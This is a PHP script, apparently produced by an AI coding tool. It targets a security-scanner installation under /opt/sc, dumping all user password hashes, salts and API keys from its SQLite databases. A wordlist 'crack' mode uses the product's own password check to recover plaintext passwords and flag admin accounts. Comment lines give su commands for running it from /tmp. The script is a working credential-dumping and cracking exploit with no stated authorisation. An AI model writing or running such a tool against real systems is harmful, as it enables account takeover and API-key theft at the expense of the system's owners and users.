1
<?php
2

3
// generated by Claude Code
4
// su - tns -s /bin/bash -c '/opt/sc/support/bin/php /tmp/dump_hashes.php 2>&1'
5
// echo -e "test\npassword\nadmin\nwrongpass" > /tmp/test_wordlist.txt
6
// su - tns -s /bin/bash -c '/opt/sc/support/bin/php /tmp/dump_hashes.php -crack /tmp/test_wordlist.txt 2>&1'
7

8
$GLOBALS["root"] = "/opt/sc";
9
require_once "/opt/sc/src/defines.php";
10
require_once "/opt/sc/src/lib/AuthenticationLib.php";
11
dbLib::setup(1, false);
12

13
$jsonMode  = in_array("-json", $argv);
14
$crackMode = in_array("-crack", $argv);
15
$wordlist  = null;
16

17
// Find wordlist argument (value after -crack)
18
foreach ($argv as $i => $arg) {
19
    if ($arg === "-crack" && isset($argv[$i+1])) {
20
        $wordlist = $argv[$i+1];
21
    }
22
}
23

24
if ($crackMode && (!$wordlist || !file_exists($wordlist))) {
25
    fwrite(STDERR, "Usage: php dump_hashes.php -crack /path/to/wordlist.txt [-json]\n");
26
    exit(1);
27
}
28

29
// Load users
30
$appdb = new PDO("sqlite:/opt/sc/application.db");
31
$adminUsers = $appdb->query("SELECT username FROM AdminUser")->fetchAll(PDO::FETCH_COLUMN);
32
$adminSet = array_map("strtolower", $adminUsers);
33
$users = $appdb->query("SELECT * FROM UserAuth")->fetchAll(PDO::FETCH_ASSOC);
34
foreach ($users as &$u) {
35
    $u["isAdmin"] = in_array(strtolower($u["username"]), $adminSet) ? "true" : "false";
36
}
37
unset($u);
38

39
// Also load org DB users
40
foreach (glob("/opt/sc/orgs/*/organization.db") as $orgdb) {
41
    $db2 = new PDO("sqlite:$orgdb");
42
    $tables = $db2->query("SELECT name FROM sqlite_master WHERE type='table' AND name='UserAuth'")->fetchAll(PDO::FETCH_COLUMN);
43
    foreach ($tables as $t) {
44
        $rows = $db2->query("SELECT * FROM $t")->fetchAll(PDO::FETCH_ASSOC);
45
        foreach ($rows as &$row) {
46
            $row["isAdmin"] = in_array(strtolower($row["username"]), $adminSet) ? "true" : "false";
47
            $row["_source"] = $orgdb;
48
        }
49
        unset($row);
50
        $users = array_merge($users, $rows);
51
    }
52
}
53

54
// Load API keys
55
$apikeys = $appdb->query("SELECT * FROM APIKey")->fetchAll(PDO::FETCH_ASSOC);
56

57
if ($crackMode) {
58
    // Crack mode
59
    $cracked = [];
60
    $fh = fopen($wordlist, "r");
61
    $i = 0;
62
    $start = microtime(true);
63
    $results = [];
64

65
    while (!feof($fh)) {
66
        $word = trim(fgets($fh));
67
        if ($word === "") continue;
68
        $i++;
69

70
        if ($i % 500 === 0) {
71
            $elapsed = microtime(true) - $start;
72
            $rate = round($i / $elapsed);
73
            fwrite(STDERR, "[$i tried | {$rate}/sec | " . count($cracked) . "/" . count($users) . " cracked]\n");
74
        }
75

76
        foreach ($users as $user) {
77
            $uname = $user["username"];
78
            $uid   = $user["id"] ?? $user["userID"] ?? "?";
79
            $key   = $uid . ":" . $uname;
80
            if (isset($cracked[$key])) continue;
81
            try {
82
                if (AuthenticationLib::goodPassword($user["authType"], $user["orgID"], $uname, $word, $user["password"], $user["salt"])) {
83
                    $cracked[$key] = $word;
84
                    if ($jsonMode) {
85
                        $results[] = ["id" => $uid, "username" => $uname, "password" => $word, "isAdmin" => $user["isAdmin"]];
86
                    } else {
87
                        echo "CRACKED: id=$uid username=$uname password=$word\n";
88
                    }
89
                    flush();
90
                }
91
            } catch (Throwable $e) { continue; }
92
        }
93

94
        if (count($cracked) === count($users)) break;
95
    }
96

97
    $elapsed = round(microtime(true) - $start, 2);
98
    $rate = round($i / max($elapsed, 0.01));
99
    fwrite(STDERR, "Done. $i words in {$elapsed}s ({$rate}/sec). " . count($cracked) . "/" . count($users) . " cracked.\n");
100

101
    if ($jsonMode) echo json_encode($results, JSON_PRETTY_PRINT) . "\n";
102

103
} else {
104
    // Default list mode
105
    $results = [];
106

107
    if ($jsonMode) {
108
        foreach ($users as $u) {
109
            $u["_table"] = "UserAuth";
110
            $u["_source"] = $u["_source"] ?? "application.db";
111
            $results[] = $u;
112
        }
113
        foreach ($apikeys as $k) {
114
            $k["_table"] = "APIKey";
115
            $k["_source"] = "application.db";
116
            $results[] = $k;
117
        }
118
        echo json_encode($results, JSON_PRETTY_PRINT) . "\n";
119
    } else {
120
        echo "\n" . str_repeat("=", 60) . "\n";
121
        echo "TABLE: application.db.UserAuth (" . count($users) . " rows)\n";
122
        echo str_repeat("=", 60) . "\n";
123
        foreach ($users as $i => $row) {
124
            echo "  --- Row " . ($i+1) . " ---\n";
125
            foreach ($row as $col => $val) echo "  $col: $val\n";
126
        }
127

128
        echo "\n" . str_repeat("=", 60) . "\n";
129
        echo "TABLE: application.db.APIKey (" . count($apikeys) . " rows)\n";
130
        echo str_repeat("=", 60) . "\n";
131
        foreach ($apikeys as $i => $row) {
132
            echo "  --- Row " . ($i+1) . " ---\n";
133
            foreach ($row as $col => $val) echo "  $col: $val\n";
134
        }
135

136
        echo "\nDONE\n";
137
    }
138
}
139

140